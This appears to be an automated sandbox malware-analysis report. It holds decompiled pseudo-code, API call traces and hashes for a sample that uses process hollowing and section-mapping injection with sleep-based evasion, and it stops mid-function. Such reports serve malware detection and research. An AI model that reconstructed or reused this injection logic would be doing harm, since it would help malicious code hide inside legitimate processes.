                                                                                  • Instruction ID: 0aa20d2447839de78841e397ac8e9610b2a8b1345c7799d76695abdccd177be1
                                                                                  • Opcode Fuzzy Hash: f7b2af990834639229ccfabb40bfb65ed4cd40ece049db58581dba00d3209e05
                                                                                  • Instruction Fuzzy Hash: 83016276204204FADB016AD59DA1EBB3619AB40765F204177BA03B80F1D57C9512EB6F
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 256 4019a8-4019e0 call 4012bf Sleep call 401505 267 4019e2-4019ea call 4015d6 256->267 268 4019ef-401a16 256->268 267->268 275 401a19-401a22 call 4012bf 268->275 276 401a0d-401a12 268->276 276->275
                                                                                  C-Code - Quality: 28%
                                                                                  			E004019A8(void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                                                  				void* _t8;
                                                                                  				void* _t11;
                                                                                  				intOrPtr* _t15;
                                                                                  				void* _t17;
                                                                                  				void* _t20;
                                                                                  
                                                                                  				_t21 = __eflags;
                                                                                  				_t18 = __edi;
                                                                                  				asm("pushad");
                                                                                  				_t8 = 0x19c3;
                                                                                  				_push(0x5b);
                                                                                  				E004012BF(_t8, __edi, __esi, __eflags);
                                                                                  				_t15 =  *((intOrPtr*)(_t20 + 8));
                                                                                  				Sleep(0x1388);
                                                                                  				_push(_t20 - 4);
                                                                                  				_push( *((intOrPtr*)(_t20 + 0x10)));
                                                                                  				_push( *((intOrPtr*)(_t20 + 0xc)));
                                                                                  				_push(_t15); // executed
                                                                                  				_t11 = E00401505(_t15, _t17, _t18, __esi, _t21); // executed
                                                                                  				if(_t11 != 0) {
                                                                                  					E004015D6(_t17, __fp0, _t15, _t11,  *((intOrPtr*)(_t20 - 4)),  *((intOrPtr*)(_t20 + 0x14))); // executed
                                                                                  				}
                                                                                  				 *_t15(0xffffffff, 0);
                                                                                  			}








                                                                                  0x004019a8
                                                                                  0x004019a8
                                                                                  0x004019a8
                                                                                  0x004019a4
                                                                                  0x004019b4
                                                                                  0x004019be
                                                                                  0x004019c3
                                                                                  0x004019cb
                                                                                  0x004019d1
                                                                                  0x004019d2
                                                                                  0x004019d5
                                                                                  0x004019d8
                                                                                  0x004019d9
                                                                                  0x004019e0
                                                                                  0x004019ea
                                                                                  0x004019ea
                                                                                  0x004019f3

                                                                                  APIs
                                                                                  • Sleep.KERNELBASE(00001388), ref: 004019CB
                                                                                    • Part of subcall function 004015D6: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401686
                                                                                    • Part of subcall function 004015D6: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016B3
                                                                                    • Part of subcall function 004015D6: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.980769882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_400000_regasm.jbxd
                                                                                  Similarity
                                                                                  • API ID: Section$CreateDuplicateObjectSleepView
                                                                                  • String ID:
                                                                                  • API String ID: 1885482327-0
                                                                                  • Opcode ID: cc4124f378ebfb8c4d973cfa0ba6405577624e74c9170e10ce5433047a2dd39d
                                                                                  • Instruction ID: cd4efd820325f2828676bad7863f4c1c9c8e29e5d8c4dba0a8040b1c4b417e4a
                                                                                  • Opcode Fuzzy Hash: cc4124f378ebfb8c4d973cfa0ba6405577624e74c9170e10ce5433047a2dd39d
                                                                                  • Instruction Fuzzy Hash: C8F0A476304204FADB015ED19DA1EBA36159B44325F204177B603B80F1D63C8602FB2F
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 279 40199e-4019e0 call 4012bf Sleep call 401505 289 4019e2-4019ea call 4015d6 279->289 290 4019ef-401a16 279->290 289->290 297 401a19-401a22 call 4012bf 290->297 298 401a0d-401a12 290->298 298->297
                                                                                  C-Code - Quality: 33%
                                                                                  			E0040199E(void* __eax, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                                                  				void* _t11;
                                                                                  				void* _t14;
                                                                                  				intOrPtr* _t18;
                                                                                  				void* _t22;
                                                                                  				void* _t25;
                                                                                  
                                                                                  				_t26 = __eflags;
                                                                                  				_t23 = __edi;
                                                                                  				_t11 = 0x19c3;
                                                                                  				_push(0x5b);
                                                                                  				E004012BF(_t11, __edi, __esi, __eflags);
                                                                                  				_t18 =  *((intOrPtr*)(_t25 + 8));
                                                                                  				Sleep(0x1388);
                                                                                  				_push(_t25 - 4);
                                                                                  				_push( *((intOrPtr*)(_t25 + 0x10)));
                                                                                  				_push( *((intOrPtr*)(_t25 + 0xc)));
                                                                                  				_push(_t18); // executed
                                                                                  				_t14 = E00401505(_t18, _t22, _t23, __esi, _t26); // executed
                                                                                  				if(_t14 != 0) {
                                                                                  					E004015D6(_t22, __fp0, _t18, _t14,  *((intOrPtr*)(_t25 - 4)),  *((intOrPtr*)(_t25 + 0x14))); // executed
                                                                                  				}
                                                                                  				 *_t18(0xffffffff, 0);
                                                                                  			}








                                                                                  0x0040199e
                                                                                  0x0040199e
                                                                                  0x004019a4
                                                                                  0x004019b4
                                                                                  0x004019be
                                                                                  0x004019c3
                                                                                  0x004019cb
                                                                                  0x004019d1
                                                                                  0x004019d2
                                                                                  0x004019d5
                                                                                  0x004019d8
                                                                                  0x004019d9
                                                                                  0x004019e0
                                                                                  0x004019ea
                                                                                  0x004019ea
                                                                                  0x004019f3

                                                                                  APIs
                                                                                  • Sleep.KERNELBASE(00001388), ref: 004019CB
                                                                                    • Part of subcall function 004015D6: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401686
                                                                                    • Part of subcall function 004015D6: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016B3
                                                                                    • Part of subcall function 004015D6: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.980769882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_400000_regasm.jbxd
                                                                                  Similarity
                                                                                  • API ID: Section$CreateDuplicateObjectSleepView
                                                                                  • String ID:
                                                                                  • API String ID: 1885482327-0
                                                                                  • Opcode ID: 4cda74984199fe5fdcc62c39ea14e1dc28dd1d6ece90b76e1d1edcb9b8d3ca26
                                                                                  • Instruction ID: 1d23cc1d6f9959439ea987ff8db1f24ad8dc78c76834636317f07c9066609db8
                                                                                  • Opcode Fuzzy Hash: 4cda74984199fe5fdcc62c39ea14e1dc28dd1d6ece90b76e1d1edcb9b8d3ca26
                                                                                  • Instruction Fuzzy Hash: 56F0C276304205FBDB015ED19DA1EBE3219AB40325F204277BA03B90F1D63C8602FB2B
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 301 4019ab-4019e0 call 4012bf Sleep call 401505 310 4019e2-4019ea call 4015d6 301->310 311 4019ef-401a16 301->311 310->311 318 401a19-401a22 call 4012bf 311->318 319 401a0d-401a12 311->319 319->318
                                                                                  C-Code - Quality: 25%
                                                                                  			E004019AB(void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                                                  				void* _t8;
                                                                                  				void* _t11;
                                                                                  				intOrPtr* _t15;
                                                                                  				void* _t17;
                                                                                  				void* _t20;
                                                                                  
                                                                                  				_t21 = __eflags;
                                                                                  				_t18 = __edi;
                                                                                  				asm("scasd");
                                                                                  				_push(0x5b);
                                                                                  				E004012BF(_t8, __edi, __esi, __eflags);
                                                                                  				_t15 =  *((intOrPtr*)(_t20 + 8));
                                                                                  				Sleep(0x1388);
                                                                                  				_push(_t20 - 4);
                                                                                  				_push( *((intOrPtr*)(_t20 + 0x10)));
                                                                                  				_push( *((intOrPtr*)(_t20 + 0xc)));
                                                                                  				_push(_t15); // executed
                                                                                  				_t11 = E00401505(_t15, _t17, _t18, __esi, _t21); // executed
                                                                                  				if(_t11 != 0) {
                                                                                  					E004015D6(_t17, __fp0, _t15, _t11,  *((intOrPtr*)(_t20 - 4)),  *((intOrPtr*)(_t20 + 0x14))); // executed
                                                                                  				}
                                                                                  				 *_t15(0xffffffff, 0);
                                                                                  			}








                                                                                  0x004019ab
                                                                                  0x004019ab
                                                                                  0x004019ab
                                                                                  0x004019b4
                                                                                  0x004019be
                                                                                  0x004019c3
                                                                                  0x004019cb
                                                                                  0x004019d1
                                                                                  0x004019d2
                                                                                  0x004019d5
                                                                                  0x004019d8
                                                                                  0x004019d9
                                                                                  0x004019e0
                                                                                  0x004019ea
                                                                                  0x004019ea
                                                                                  0x004019f3

                                                                                  APIs
                                                                                  • Sleep.KERNELBASE(00001388), ref: 004019CB
                                                                                    • Part of subcall function 004015D6: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401686
                                                                                    • Part of subcall function 004015D6: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016B3
                                                                                    • Part of subcall function 004015D6: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.980769882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_400000_regasm.jbxd
                                                                                  Similarity
                                                                                  • API ID: Section$CreateDuplicateObjectSleepView
                                                                                  • String ID:
                                                                                  • API String ID: 1885482327-0
                                                                                  • Opcode ID: cc42d651ce71517080449790dab5af19937afd1f012226342f5998b84b3007a9
                                                                                  • Instruction ID: 5a5749d72c8a791954f89c67905b043f8ffa113a7fe08d61e0168edf760d7917
                                                                                  • Opcode Fuzzy Hash: cc42d651ce71517080449790dab5af19937afd1f012226342f5998b84b3007a9
                                                                                  • Instruction Fuzzy Hash: 18F09676304204FBDB015ED19D91EAE32199B44315F204277BA03B80F1D63C8512FF2B
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 322 4019ae-4019e0 call 4012bf Sleep call 401505 329 4019e2-4019ea call 4015d6 322->329 330 4019ef-401a16 322->330 329->330 337 401a19-401a22 call 4012bf 330->337 338 401a0d-401a12 330->338 338->337
                                                                                  APIs
                                                                                  • Sleep.KERNELBASE(00001388), ref: 004019CB
                                                                                    • Part of subcall function 004015D6: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401686
                                                                                    • Part of subcall function 004015D6: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016B3
                                                                                    • Part of subcall function 004015D6: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.980769882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_400000_regasm.jbxd
                                                                                  Similarity
                                                                                  • API ID: Section$CreateDuplicateObjectSleepView
                                                                                  • String ID:
                                                                                  • API String ID: 1885482327-0
                                                                                  • Opcode ID: 1ab0b94f97cddce7fe3d3ca4062fd24c080078a7160b19a57c2bf38a9fe7cd07
                                                                                  • Instruction ID: 1e859a61d86f5cd1831732a8203d1a095f79bb04fba549480ad92d8a0b8a5086
                                                                                  • Opcode Fuzzy Hash: 1ab0b94f97cddce7fe3d3ca4062fd24c080078a7160b19a57c2bf38a9fe7cd07
                                                                                  • Instruction Fuzzy Hash: 89F09032304204FBDB016ED19D81EAE3219AB40316F204277BA03B80F1DA3C8912AB2B
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 341 4019b9-4019e0 call 4012bf Sleep call 401505 347 4019e2-4019ea call 4015d6 341->347 348 4019ef-401a16 341->348 347->348 355 401a19-401a22 call 4012bf 348->355 356 401a0d-401a12 348->356 356->355
                                                                                  C-Code - Quality: 33%
                                                                                  			E004019B9(signed int __eax, void* __edi, void* __esi, void* __fp0) {
                                                                                  				void* _t12;
                                                                                  				intOrPtr* _t16;
                                                                                  				void* _t18;
                                                                                  				void* _t21;
                                                                                  				signed int _t22;
                                                                                  
                                                                                  				_t19 = __edi;
                                                                                  				_t9 = __eax & 0xe3f7ebbe;
                                                                                  				_t22 = __eax & 0xe3f7ebbe;
                                                                                  				_push(0x5b);
                                                                                  				E004012BF(_t9, __edi, __esi, _t22);
                                                                                  				_t16 =  *((intOrPtr*)(_t21 + 8));
                                                                                  				Sleep(0x1388);
                                                                                  				_push(_t21 - 4);
                                                                                  				_push( *((intOrPtr*)(_t21 + 0x10)));
                                                                                  				_push( *((intOrPtr*)(_t21 + 0xc)));
                                                                                  				_push(_t16); // executed
                                                                                  				_t12 = E00401505(_t16, _t18, _t19, __esi, _t22); // executed
                                                                                  				if(_t12 != 0) {
                                                                                  					E004015D6(_t18, __fp0, _t16, _t12,  *((intOrPtr*)(_t21 - 4)),  *((intOrPtr*)(_t21 + 0x14))); // executed
                                                                                  				}
                                                                                  				 *_t16(0xffffffff, 0);
                                                                                  			}








                                                                                  0x004019b9
                                                                                  0x004019b9
                                                                                  0x004019b9
                                                                                  0x004019b4
                                                                                  0x004019be
                                                                                  0x004019c3
                                                                                  0x004019cb
                                                                                  0x004019d1
                                                                                  0x004019d2
                                                                                  0x004019d5
                                                                                  0x004019d8
                                                                                  0x004019d9
                                                                                  0x004019e0
                                                                                  0x004019ea
                                                                                  0x004019ea
                                                                                  0x004019f3

                                                                                  APIs
                                                                                  • Sleep.KERNELBASE(00001388), ref: 004019CB
                                                                                    • Part of subcall function 004015D6: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401686
                                                                                    • Part of subcall function 004015D6: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016B3
                                                                                    • Part of subcall function 004015D6: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016D6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.980769882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_400000_regasm.jbxd
                                                                                  Similarity
                                                                                  • API ID: Section$CreateDuplicateObjectSleepView
                                                                                  • String ID:
                                                                                  • API String ID: 1885482327-0
                                                                                  • Opcode ID: 14c867bbebe5051f6db570b021724a6e87e9878d4436d251b998ffee1e39de59
                                                                                  • Instruction ID: f970500131d6f5d7b0cda6bb56c9dd11f6daaaa1a25153813255a2f113a46715
                                                                                  • Opcode Fuzzy Hash: 14c867bbebe5051f6db570b021724a6e87e9878d4436d251b998ffee1e39de59
                                                                                  • Instruction Fuzzy Hash: C7F05436304208F7DB016FD5DD51EAE3619AB44355F204177BA13B81F1D63C8511AB2B
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Execution Graph

                                                                                  Execution Coverage:16.9%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:0%
                                                                                  Total number of Nodes:40
                                                                                  Total number of Limit Nodes:7
                                                                                  execution_graph 1390 29c680 1393 29c68f 1390->1393 1394 29c69e 1393->1394 1397 29ce2f 1394->1397 1402 29ce4a 1397->1402 1398 29ce53 CreateToolhelp32Snapshot 1399 29ce6f Module32First 1398->1399 1398->1402 1400 29ce7e 1399->1400 1401 29c68e 1399->1401 1404 29caee 1400->1404 1402->1398 1402->1399 1405 29cb19 1404->1405 1406 29cb2a VirtualAlloc 1405->1406 1407 29cb62 1405->1407 1406->1407 1407->1407 1408 1b0000 1411 1b0630 1408->1411 1410 1b0005 1412 1b064c 1411->1412 1414 1b1577 1412->1414 1417 1b05b0 1414->1417 1420 1b05dc 1417->1420 1418 1b061e 1419 1b05e2 GetFileAttributesA 1419->1420 1420->1418 1420->1419 1422 1b0420 1420->1422 1423 1b04f3 1422->1423 1424 1b04fa 1423->1424 1425 1b04ff CreateWindowExA 1423->1425 1424->1420 1425->1424 1426 1b0540 PostMessageA 1425->1426 1427 1b055f 1426->1427 1427->1424 1429 1b0110 VirtualAlloc GetModuleFileNameA 1427->1429 1430 1b017d CreateProcessA 1429->1430 1431 1b0414 1429->1431 1430->1431 1433 1b025f VirtualFree VirtualAlloc 1430->1433 1431->1427 1434 1b02a1 1433->1434 1434->1431 1435 1b02a9 ReadProcessMemory 1434->1435 1436 1b02e5 VirtualAllocEx NtWriteVirtualMemory 1435->1436 1437 1b02d5 NtUnmapViewOfSection 1435->1437 1438 1b033b 1436->1438 1437->1436 1439 1b039d WriteProcessMemory Wow64SetThreadContext ResumeThread CloseHandle 1438->1439 1440 1b0350 NtWriteVirtualMemory 1438->1440 1441 1b0407 ExitProcess 1439->1441 1440->1438

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 001B0156
                                                                                  • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 001B016C
                                                                                  • CreateProcessA.KERNEL32(?,00000000), ref: 001B0255
                                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 001B0270
                                                                                  • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 001B0283
                                                                                  • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 001B02C8
                                                                                  • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 001B02E3
                                                                                  • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 001B0304
                                                                                  • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 001B032A
                                                                                  • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 001B0399
                                                                                  • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 001B03BF
                                                                                  • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 001B03E1
                                                                                  • ResumeThread.KERNELBASE(00000000), ref: 001B03ED
                                                                                  • CloseHandle.KERNELBASE(00000000), ref: 001B03F9
                                                                                  • ExitProcess.KERNELBASE(00000000), ref: 001B0412
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.1022521817.00000000001B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_1b0000_efbhiii.jbxd
                                                                                  Similarity
                                                                                  • API ID: Virtual$MemoryProcess$AllocWrite$Thread$CloseContextCreateExitFileFreeHandleModuleNameReadResumeSectionUnmapViewWow64
                                                                                  • String ID:
                                                                                  • API String ID: 3514283409-0
                                                                                  • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                  • Instruction ID: e844b325a5245a22eb84d7703391371a7a06ea3d086bfb5d1a7bbd88632aaa41
                                                                                  • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                  • Instruction Fuzzy Hash: 69B1B674A00208AFDB44CF98C895F9EBBB5BF88314F248158E509AB395D771AE45CF94
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 15 1b0420-1b04f8 17 1b04fa 15->17 18 1b04ff-1b053c CreateWindowExA 15->18 19 1b05aa-1b05ad 17->19 20 1b053e 18->20 21 1b0540-1b0558 PostMessageA 18->21 20->19 22 1b055f-1b0563 21->22 22->19 23 1b0565-1b0579 22->23 23->19 25 1b057b-1b0582 23->25 26 1b05a8 25->26 27 1b0584-1b0588 25->27 26->22 27->26 28 1b058a-1b0591 27->28 28->26 29 1b0593-1b0597 call 1b0110 28->29 31 1b059c-1b05a5 29->31 31->26
                                                                                  APIs
                                                                                  • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 001B0533
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.1022521817.00000000001B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_1b0000_efbhiii.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateWindow
                                                                                  • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                                                                                  • API String ID: 716092398-2341455598
                                                                                  • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                  • Instruction ID: 04eff4232aff31db78c70daf9d79d73137fdbdb4e684738b39f5bef741287e30
                                                                                  • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                  • Instruction Fuzzy Hash: 7E512B70D08388DEEB11CBD8C849BDEBFB66F15708F144058D5447F286C3BA5658CB66
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 32 1b05b0-1b05d5 33 1b05dc-1b05e0 32->33 34 1b061e-1b0621 33->34 35 1b05e2-1b05f5 GetFileAttributesA 33->35 36 1b0613-1b061c 35->36 37 1b05f7-1b05fe 35->37 36->33 37->36 38 1b0600-1b060b call 1b0420 37->38 40 1b0610 38->40 40->36
                                                                                  APIs
                                                                                  • GetFileAttributesA.KERNELBASE(apfHQ), ref: 001B05EC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.1022521817.00000000001B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_1b0000_efbhiii.jbxd
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID: apfHQ$o
                                                                                  • API String ID: 3188754299-2999369273
                                                                                  • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                  • Instruction ID: 33c47c271cdd9a6bd878b8d4df254921d54d752df5b655cf095d58733077aa63
                                                                                  • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                  • Instruction Fuzzy Hash: D3011A70C0424CEADB15DBA8C5187EEBFB5AF45308F148099C4092B242D7B69B99CBA2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 41 29ce2f-29ce48 42 29ce4a-29ce4c 41->42 43 29ce4e 42->43 44 29ce53-29ce5f CreateToolhelp32Snapshot 42->44 43->44 45 29ce6f-29ce7c Module32First 44->45 46 29ce61-29ce67 44->46 47 29ce7e-29ce7f call 29caee 45->47 48 29ce85-29ce8d 45->48 46->45 51 29ce69-29ce6d 46->51 52 29ce84 47->52 51->42 51->45 52->48
                                                                                  APIs
                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0029CE57
                                                                                  • Module32First.KERNEL32(00000000,00000224), ref: 0029CE77
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.1022592251.0000000000298000.00000040.00000020.00020000.00000000.sdmp, Offset: 00298000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_298000_efbhiii.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                  • String ID:
                                                                                  • API String ID: 3833638111-0
                                                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                  • Instruction ID: 801c7c6ea471250333be31076ae9e06a5649ba72d73251563d83aea361afeab3
                                                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                  • Instruction Fuzzy Hash: F0F090326107156BEB203FF9A98DB6F76ECAF49724F200628E687D20C0DB70EC554A61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 54 29caee-29cb28 call 29ce01 57 29cb2a-29cb5d VirtualAlloc call 29cb7b 54->57 58 29cb76 54->58 60 29cb62-29cb74 57->60 58->58 60->58
                                                                                  APIs
                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0029CB3F
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.1022592251.0000000000298000.00000040.00000020.00020000.00000000.sdmp, Offset: 00298000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_298000_efbhiii.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 4275171209-0
                                                                                  • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                  • Instruction ID: 173c2278d2d19c954f887ee624e3a8d7fb3c1e76f7ec55aa4526fb2e692001ea
                                                                                  • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                  • Instruction Fuzzy Hash: 8B113979A00208EFDB01DF98C985E98BBF5AF09351F1580A4F9489B362D371EA90DF80
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Execution Graph

                                                                                  Execution Coverage:7.7%
                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:0%
                                                                                  Total number of Nodes:54
                                                                                  Total number of Limit Nodes:1
                                                                                  execution_graph 1973 4017c4 1974 4017d6 1973->1974 1975 40188a Sleep 1974->1975 1975->1974 1946 401807 1947 4017ef 1946->1947 1949 40188a 1947->1949 1950 4018b5 1949->1950 1953 4030c3 1950->1953 1952 4018e9 1952->1947 1955 403051 1953->1955 1954 4030f3 1954->1952 1954->1954 1955->1953 1955->1954 1956 4030ba Sleep 1955->1956 1956->1955 1920 402c74 1923 402c6c 1920->1923 1921 402cfd 1923->1921 1924 40198e 1923->1924 1925 40199f 1924->1925 1926 4019c3 Sleep 1925->1926 1927 4019de 1926->1927 1929 4019ef 1927->1929 1930 4015d6 1927->1930 1929->1921 1931 4015e7 1930->1931 1932 401677 NtDuplicateObject 1931->1932 1937 401793 1931->1937 1933 401694 NtCreateSection 1932->1933 1932->1937 1934 401714 NtCreateSection 1933->1934 1935 4016ba NtMapViewOfSection 1933->1935 1934->1937 1938 401740 1934->1938 1935->1934 1936 4016dd NtMapViewOfSection 1935->1936 1936->1934 1939 4016fb 1936->1939 1937->1929 1938->1937 1940 40174a NtMapViewOfSection 1938->1940 1939->1934 1940->1937 1941 401771 NtMapViewOfSection 1940->1941 1941->1937 1976 4015d5 1977 4015e7 1976->1977 1978 401677 NtDuplicateObject 1977->1978 1983 401793 1977->1983 1979 401694 NtCreateSection 1978->1979 1978->1983 1980 401714 NtCreateSection 1979->1980 1981 4016ba NtMapViewOfSection 1979->1981 1980->1983 1984 401740 1980->1984 1981->1980 1982 4016dd NtMapViewOfSection 1981->1982 1982->1980 1985 4016fb 1982->1985 1984->1983 1986 40174a NtMapViewOfSection 1984->1986 1985->1980 1986->1983 1987 401771 NtMapViewOfSection 1986->1987 1987->1983 1969 402c3c 1972 402c50 1969->1972 1970 402cfd 1971 40198e 8 API calls 1971->1970 1972->1970 1972->1971 2033 40199e 2034 40199f 2033->2034 2035 4019c3 Sleep 2034->2035 2036 4019de 2035->2036 2037 4015d6 7 API calls 2036->2037 2038 4019ef 2036->2038 2037->2038

                                                                                  Control-flow Graph

                                                                                  C-Code - Quality: 37%
                                                                                  			E004015D6(void* __edx, void* __fp0, void* _a4, void* _a8, void* _a12, void* _a16) {
                                                                                  				void* _v3;
                                                                                  				void* _v8;
                                                                                  				void* _v12;
                                                                                  				void* _v16;
                                                                                  				void* _v20;
                                                                                  				void* _v44;
                                                                                  				void* _v52;
                                                                                  				void* _v56;
                                                                                  				void* _v60;
                                                                                  				void* _v64;
                                                                                  				void* _v68;
                                                                                  				void* _v72;
                                                                                  				void* _v76;
                                                                                  				void* _v84;
                                                                                  				void* _v88;
                                                                                  				void* _v92;
                                                                                  				void* _v96;
                                                                                  				void* _v100;
                                                                                  				void* _t84;
                                                                                  
                                                                                  				_t84 = 0x1613;
